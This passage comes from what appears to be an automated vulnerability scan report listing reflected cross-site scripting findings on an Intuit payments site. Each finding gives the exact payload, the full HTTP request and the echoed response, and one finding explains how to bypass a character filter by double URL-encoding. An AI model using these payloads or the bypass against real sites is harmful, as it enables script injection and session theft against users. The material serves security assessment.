Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C3E8D0A0805192AA117E3F1EDA955
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161658


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input type="radio" id="in_quickbooks_true" name="process_payment_type" value="true" onclick="changeMSCFlag('true','cardfbd42"><script>alert(1)</script>c5a639cbe3e');" />
...[SNIP]...

1.4. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [uaenv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the uaenv request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 100cc'%3balert(1)//21604655727 was submitted in the uaenv parameter. This input was echoed as 100cc';alert(1)//21604655727 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prod100cc'%3balert(1)//21604655727&bas=card HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:14 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=euYdvJzwS0vhcYVatmDW7w**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:16 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C195D0A0805192AA117E38C4A9C75
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161460


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
tedHardwareId);
       var bas;
       if(initialSelectedSolution != undefined && initialSelectedSolution != '')
       {
           bas = initialSelectedSolution;
       }
if(UAenv == null)
{
           UAenv = 'prod100cc';alert(1)//21604655727';
}
       if(UAenv == "null" || UAenv == null)
       {
           UAenv = "prod";
       }
       var return_url = 'http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp' + "?requestType=rtnFromUA&uaenv
...[SNIP]...

1.5. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [uaenv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the uaenv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5165"%3balert(1)//11b088fde41 was submitted in the uaenv parameter. This input was echoed as c5165";alert(1)//11b088fde41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apply-now/check-warranty-apply-now.jsp?requestType=rtnFromUA&uaenv=prodc5165"%3balert(1)//11b088fde41&bas=card HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:50 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Mpqqf8aOaufCGZGLg+D68Q**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:51 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95BBAA80A0805192AA117E3BFDAC659
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161460


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...

var ua_selected_add_on_service_ids;
var ua_available_add_on_services_ids;
var ua_selected_hardware_ids;
var ua_selected_hardware_own_type;    

var ua_selected_card_service_id;

var UAenv = "prodc5165";alert(1)//11b088fde41";

var mandatory_card_name;
var mandatory_card_id;

var selectedCardMap;
var records;
   

$(document).ready(function()
{
       requestType = 'rtnFromUA';
       bas = 'card';
       sbweb.util.log.
...[SNIP]...

1.6. http://payments.intuit.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5deb3%2527%252dalert%25281%2529%252d%2527ae164b743d5 was submitted in the Referer HTTP header. This input was echoed as 5deb3'-alert(1)-'ae164b743d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: payments.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; propertySegments=1300724387448%7CQB%3A1%3A%3A; s_cc=true; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300726205880%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; SurveyClosed=true; Survey_Tracker=TRUE; mbox=session#1300724385027-792520#1300726359|PC#1300724385027-792520.17#1303316499|check#true#1300724559; SHOPPER_USER_ID=2848631086
Referer: 5deb3%2527%252dalert%25281%2529%252d%2527ae164b743d5

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:37 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:58:38 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D938BD4E0A08058F1774D40DAF139FA7
x-wily-servlet: Clear appServerIp=10.8.5.143&agentName=app2&servletName=index_jsp&agentHost=esprdatg119&agentProcess=JBoss
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108420


                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<script>
                   // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = '5deb3'-alert(1)-'ae164b743d5';
                   </script>
...[SNIP]...

1.7. http://payments.intuit.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload b9588--><script>alert(1)</script>36da4f0cb8f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: payments.intuit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: INTUIT_SESSIONID=RELMgEwqF2E9P+VGkdp-iA**.g119-2; abTestId=0000000000002223720; abTestGroup=T2; abTestPriorityCode=0273400000; propertySegments=1300724387448%7CQB%3A1%3A%3A; s_cc=true; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300726205880%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; SurveyClosed=true; Survey_Tracker=TRUE; mbox=session#1300724385027-792520#1300726359|PC#1300724385027-792520.17#1303316499|check#true#1300724559; SHOPPER_USER_ID=2848631086
Referer: http://www.google.com/search?hl=en&q=b9588--><script>alert(1)</script>36da4f0cb8f

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 05:58:40 GMT; Path=/
Set-Cookie: priorityCode=4899600000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D938C4260A08058F1774D40DE881A3BE
x-wily-servlet: Clear appServerIp=10.8.5.143&agentName=app2&servletName=index_jsp&agentHost=esprdatg119&agentProcess=JBoss
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108511


                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=b9588--><script>alert(1)</script>36da4f0cb8f | -->
...[SNIP]...

1.8. http://payments.intuit.com/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ea6a'-alert(1)-'22e1363c582 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /?launchHelpMeChoose=true HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=1ea6a'-alert(1)-'22e1363c582

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:55:55 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=FZHR3jYkS+lzDwEbeMUcJw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:32:56 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D958225A0A0805192AA117E39659CAAC
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 108426


                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=1ea6a'-alert(1)-'22e1363c582';
                   </script>
...[SNIP]...

1.9. http://payments.intuit.com/apply-now/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11fdb'-alert(1)-'203a332f69f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=11fdb'-alert(1)-'203a332f69f

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=xA8xNwxVexVzMS2lpmfgzg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:40 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96022AC0A0805192AA117E3CA858BCC
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 128360


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=11fdb'-alert(1)-'203a332f69f';
                   </script>
...[SNIP]...

1.10. http://payments.intuit.com/apply-now/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 38475--><script>alert(1)</script>4d6c73c632 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /apply-now/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=38475--><script>alert(1)</script>4d6c73c632

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:54 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=+mJdpJukVkdDu-nhiluhMA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:55 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9605E300A0805192AA117E31E12C9D2
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 128389


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=38475--><script>alert(1)</script>4d6c73c632 | -->
...[SNIP]...

1.11. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74fca'-alert(1)-'5c9bded9b65 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
